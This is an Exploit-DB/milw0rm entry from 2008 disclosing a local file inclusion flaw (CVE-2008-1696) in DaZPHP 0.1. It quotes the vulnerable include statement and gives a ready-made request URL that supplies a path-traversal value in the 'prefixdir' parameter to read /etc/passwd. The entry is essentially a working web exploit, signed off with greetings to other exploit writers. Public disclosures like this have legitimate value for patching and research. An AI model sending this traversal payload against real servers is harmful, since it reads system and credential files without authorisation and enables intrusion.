DaZPHP 0.1 prefixdir Local File Inclusion Vulnerability

2008-04-02T00:00:00
ID EDB-ID:5347
Type exploitdb
Reporter w0cker
Modified 2008-04-02T00:00:00

Description

DaZPHP 0.1 (prefixdir) Local File Inclusion Vulnerability. CVE-2008-1696. Webapps exploit for php platform

                                        
                                            Script Name : DaZPHP

Download : http://sourceforge.net/project/showfiles.php?group_id=132192
Vul Code[Example] : http://[site]/[Path]/makepost.php?prefixdir=../../../../../../etc/passwd

Error : include "./".$prefixdir."/DaZPHPNews-0.1-1/makepost.php";
Greetz : Kezzap66345 - Str0ke - Dread 35

# milw0rm.com [2008-04-02]